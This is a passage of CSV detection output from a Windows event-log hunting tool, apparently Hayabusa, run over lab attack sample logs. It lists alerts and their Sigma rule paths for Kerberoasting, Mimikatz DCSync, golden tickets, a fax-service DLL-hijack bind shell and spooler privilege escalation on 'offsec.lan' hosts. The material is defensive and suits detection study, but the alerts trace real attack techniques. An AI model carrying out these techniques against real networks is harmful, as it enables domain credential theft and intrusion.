shell (MSF).evtx +2020-08-01 22:58:28.113 +00:00,mssql01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:29.227 +00:00,mssql01.offsec.lan,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 11:21:46.062 +00:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 11:21:46.068 +00:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 11:21:46.078 +00:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 11:21:46.083 +00:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 11:21:46.088 +00:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 11:21:46.094 +00:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 11:21:46.100 +00:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 11:21:46.110 +00:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 11:21:46.117 +00:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 11:21:46.153 +00:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 11:21:46.166 +00:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 11:21:46.181 +00:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 11:21:46.181 +00:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx +2020-08-02 11:33:06.521 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: | Svc: | IP Addr: ::ffff:10.23.23.9 | Status: 0x25,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 11:33:06.523 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: Svc-SQL-DB01 | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 11:33:06.523 +00:00,rootdc1.offsec.lan,4769,medium,CredAccess,Suspicious Kerberos RC4 Ticket Encryption,,rules/sigma/builtin/security/win_susp_rc4_kerberos.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 11:37:11.847 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 11:37:12.567 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 11:37:54.898 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 11:37:54.999 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: WEC01$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 11:37:55.142 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 11:37:55.483 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 11:37:55.484 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 11:37:55.625 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx +2020-08-02 12:02:34.103 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8c41e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 12:02:35.117 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8c703,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 12:02:37.166 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8c741,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 12:02:37.200 +00:00,rootdc1.offsec.lan,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 12:02:37.200 +00:00,rootdc1.offsec.lan,4662,high,CredAccess,Mimikatz DC Sync,,rules/sigma/builtin/security/win_dcsync.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 12:02:37.212 +00:00,rootdc1.offsec.lan,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 12:02:37.212 +00:00,rootdc1.offsec.lan,4662,high,CredAccess,Mimikatz DC Sync,,rules/sigma/builtin/security/win_dcsync.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 12:02:37.213 +00:00,rootdc1.offsec.lan,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 12:02:37.213 +00:00,rootdc1.offsec.lan,4662,high,CredAccess,Mimikatz DC Sync,,rules/sigma/builtin/security/win_dcsync.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 12:03:03.560 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 0x11b8cd00,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 12:03:08.715 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: FS02$ | Computer: - | IP Addr: 10.23.42.18 | LID: 0x11b8d014,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 12:03:12.993 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8d057,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 12:04:02.850 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8dcc1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 12:04:09.689 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 12:04:09.695 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 12:04:09.696 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9d3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 12:04:09.696 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9e5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 12:04:09.816 +00:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9ea1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx +2020-08-02 12:26:03.702 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 12:26:11.437 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 12:26:20.424 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 12:27:02.387 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 12:27:19.056 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 12:27:19.742 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 12:31:20.566 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 12:31:20.567 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 12:31:20.925 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: FS02$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 12:31:20.926 +00:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: MSSQL01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx +2020-08-02 16:24:07.551 +00:00,MSEDGEWIN10,7,high,Persis | Evas,Fax Service DLL Search Order Hijack,,rules/sigma/image_load/image_load_susp_fax_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-02 16:24:07.558 +00:00,MSEDGEWIN10,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_NetSvc_SessionToken_Retrival_via_localSMB_Auth_5145.evtx +2020-08-02 16:24:07.559 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\pipey | Process: System | PID: 4 | PGUID: 747F3D96-E303-5F26-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-02 16:24:07.561 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\fxssvc.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5252 | Src PGUID: 747F3D96-E8A7-5F26-0000-0010230D1A00 | Tgt PID: 864 | Tgt PGUID: 747F3D96-E309-5F26-0000-001021BC0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-02 16:24:07.561 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\fxssvc.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5252 | Src PGUID: 747F3D96-E8A7-5F26-0000-0010230D1A00 | Tgt PID: 820 | Tgt PGUID: 747F3D96-E309-5F26-0000-0010137B0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-02 16:24:08.403 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:49674 (MSEDGEWIN10) | Dst: 0:0:0:0:0:0:0:1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-E303-5F26-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-02 16:24:08.403 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:49674 (MSEDGEWIN10) | Dst: 0:0:0:0:0:0:0:1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-E303-5F26-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-02 16:24:25.728 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49675 (MSEDGEWIN10) | Dst: 127.0.0.1:9299 (MSEDGEWIN10) | User: MSEDGEWIN10\IEUser | Process: C:\Users\IEUser\Tools\Misc\nc.exe | PID: 7836 | PGUID: 747F3D96-E8B8-5F26-0000-00100AA71A00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-02 16:24:25.728 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49675 (MSEDGEWIN10) | Dst: 127.0.0.1:9299 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\FXSSVC.exe | PID: 5252 | PGUID: 747F3D96-E8A7-5F26-0000-0010230D1A00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-02 16:24:26.809 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x3e7 | PID: 8104 | PGUID: 747F3D96-E8BA-5F26-0000-001035BE1A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-02 16:24:28.640 +00:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-02 16:24:28.640 +00:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation_sysmon/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-02 16:24:28.640 +00:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-02 16:24:28.640 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""c:\windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 588 | PGUID: 747F3D96-E8BC-5F26-0000-0010F7C41A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx +2020-08-12 13:04:27.419 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\Temp\__SKIP_1E14 | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.454 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\{A6F2FD48-5F14-4B5F-ACC3-8DE2ACD8E384} | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.551 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\Old | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx +2020-08-12 13:04:27.551 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 